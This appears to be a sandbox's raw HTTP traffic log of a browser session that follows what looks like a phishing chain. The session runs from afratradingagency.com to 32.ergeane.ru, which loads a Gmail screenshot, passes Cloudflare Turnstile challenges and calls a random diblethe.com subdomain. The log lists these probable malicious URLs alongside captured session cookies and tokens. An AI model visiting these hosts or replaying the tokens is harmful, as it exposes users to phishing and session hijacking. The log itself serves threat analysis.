    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f418d689add32ca/1734550072811/ws77LC-Zvt6wd3o HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f418d689add32ca/1734550072811/ws77LC-Zvt6wd3o HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f418d689add32ca/1734550072814/43f2e9d347adfa999698c3de808376dcbbeb8fdd81c9d20ed7f152aa5925d797/m_5diggWAVh3NiI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /yNriUGk0/ HTTP/1.1Host: 32.ergeane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://52kz793.afratradingagency.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://32.ergeane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 32.ergeane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://32.ergeane.ru/yNriUGk0/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBSMUtzOTd4YWc3MHFGeG5HTlR2SVE9PSIsInZhbHVlIjoiOVpNUFJhRkh0c2R2WDFvR2RnM3JIdEM5Z3BhY3ExYjB1eGtQSTFkZHZGNzZXM1h3NVY5SWFFSUxtY3Vlc1M2OUpzZGY1L3hPdzhmOWVBaFJhVWtBdXBkYzY4ZkdTM0pkMU9RR3dFY2FvZFI5ZWJSZjcreUo5Wld4ZkluTlF3dDYiLCJtYWMiOiI1NjFkM2M1NzA5YWI4ZmRlNDAyODE3ZDZkYzhhYzI0OTMzZTRhMjMzOTE1NmJkZGVhNDgwYzExYzIxYTBkZDZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxQSFNRczFxZnUxOVRCMEFnaTAzeXc9PSIsInZhbHVlIjoiSlNIWEVOMUl5L29FMGU3STVSdzlQN2FBK1E0NWY0c3Q2dVcvMzFvbnZwTG1laiszS05TVnRybzBNNStSM2JuVndXRTYwSm0wSWdSZVhJTFp1Slk5ejh1aDROZTVSNDJyUnlpckswNWFuWnFZNllhandnOGt1QURzZW9MQys3Y0UiLCJtYWMiOiIyMjU2YTMyMWRkZTNhZDIzZTEyMTRjOWEzNmNiNjhhMWQ0ODM5Y2Q4NTBhMWFlZTUwNDQ5NDM2ZDMwMjEzMDIyIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://32.ergeane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /RixLwBRTZMAWsZcncGMFCwLdMTXJRJHZLUMYMZVRHZXYMGITWHJMARBESMLCNUW HTTP/1.1Host: 5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://32.ergeane.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://32.ergeane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://32.ergeane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /RixLwBRTZMAWsZcncGMFCwLdMTXJRJHZLUMYMZVRHZXYMGITWHJMARBESMLCNUW HTTP/1.1Host: 5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://52kz793.afratradingagency.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f418ee08bfa41f8&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f418ee08bfa41f8&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f418ee08bfa41f8/1734550133132/ce2a6eec6335e51e65b8256666d1557c63e830bea0bac4bd859dd894be18f968/HOSmDxED5TPSN8H HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f418ee08bfa41f8/1734550133133/5r7qG9mw9MML0Vh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f418ee08bfa41f8/1734550133133/5r7qG9mw9MML0Vh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=QQynn9tS2XiLcdGYY05yl7KIJEIKLU9wN3jIcVSvYZNtR2dlvtQMBYuDCSMb-g_dI3aDOXxETqtVjjpLAb_uVefZrmOCPaEc3MLPTu71Vv24pDdyNCxx-sGwa7y16b5VbqNxnZKg4XDQeUsBwBYWPa5QxACm2LKbJ1y8xC6m0_EKGAFst39tq3ZM
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=QQynn9tS2XiLcdGYY05yl7KIJEIKLU9wN3jIcVSvYZNtR2dlvtQMBYuDCSMb-g_dI3aDOXxETqtVjjpLAb_uVefZrmOCPaEc3MLPTu71Vv24pDdyNCxx-sGwa7y16b5VbqNxnZKg4XDQeUsBwBYWPa5QxACm2LKbJ1y8xC6m0_EKGAFst39tq3ZM
    Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=CvBdONSJlOTXnPiCO4EuPPFwvm0EaFxj7trDUyhNNdFc6G_FN1wH_QPEbYiZW0zQgkXFtiKQ0CKMDykCIwoc1fzoCwzEPxrgu2FWeoTKNu9NzfggmrBkrEfHI_tjT5TooUS_woqpRCCLaM_geIXvbdzesLAux08s102TrUKtXHfaEykl1Gw9Z1ln7n90-KkG
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=CvBdONSJlOTXnPiCO4EuPPFwvm0EaFxj7trDUyhNNdFc6G_FN1wH_QPEbYiZW0zQgkXFtiKQ0CKMDykCIwoc1fzoCwzEPxrgu2FWeoTKNu9NzfggmrBkrEfHI_tjT5TooUS_woqpRCCLaM_geIXvbdzesLAux08s102TrUKtXHfaEykl1Gw9Z1ln7n90-KkG
    Source: global trafficHTTP traffic detected: GET /yNriUGk0/ HTTP/1.1Host: 32.ergeane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://52kz793.afratradingagency.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBSMUtzOTd4YWc3MHFGeG5HTlR2SVE9PSIsInZhbHVlIjoiOVpNUFJhRkh0c2R2WDFvR2RnM3JIdEM5Z3BhY3ExYjB1eGtQSTFkZHZGNzZXM1h3NVY5SWFFSUxtY3Vlc1M2OUpzZGY1L3hPdzhmOWVBaFJhVWtBdXBkYzY4ZkdTM0pkMU9RR3dFY2FvZFI5ZWJSZjcreUo5Wld4ZkluTlF3dDYiLCJtYWMiOiI1NjFkM2M1NzA5YWI4ZmRlNDAyODE3ZDZkYzhhYzI0OTMzZTRhMjMzOTE1NmJkZGVhNDgwYzExYzIxYTBkZDZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxQSFNRczFxZnUxOVRCMEFnaTAzeXc9PSIsInZhbHVlIjoiSlNIWEVOMUl5L29FMGU3STVSdzlQN2FBK1E0NWY0c3Q2dVcvMzFvbnZwTG1laiszS05TVnRybzBNNStSM2JuVndXRTYwSm0wSWdSZVhJTFp1Slk5ejh1aDROZTVSNDJyUnlpckswNWFuWnFZNllhandnOGt1QURzZW9MQys3Y0UiLCJtYWMiOiIyMjU2YTMyMWRkZTNhZDIzZTEyMTRjOWEzNmNiNjhhMWQ0ODM5Y2Q4NTBhMWFlZTUwNDQ5NDM2ZDMwMjEzMDIyIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=CvBdONSJlOTXnPiCO4EuPPFwvm0EaFxj7trDUyhNNdFc6G_FN1wH_QPEbYiZW0zQgkXFtiKQ0CKMDykCIwoc1fzoCwzEPxrgu2FWeoTKNu9NzfggmrBkrEfHI_tjT5TooUS_woqpRCCLaM_geIXvbdzesLAux08s102TrUKtXHfaEykl1Gw9Z1ln7n90-KkG
    Source: global trafficHTTP traffic detected: GET /5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://32.ergeane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=wRUGrbxA9AELHJ4cTHJwKs4j1qXDKqJa1Pgjf09YU_Q-1734550104-1.0.1.1-J._13cXHYuAzy2kXPPb_rXhS7H6AcyQW3fmllIWPH6oBk86aYFdnOvFEpgqvu37EVIMs8HpC2n2mSJyz1uCTRARange: bytes=104981-104981If-Range: "428183bfb7c31d8c3bcc985dac004681"
    Source: global trafficHTTP traffic detected: GET /5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://32.ergeane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 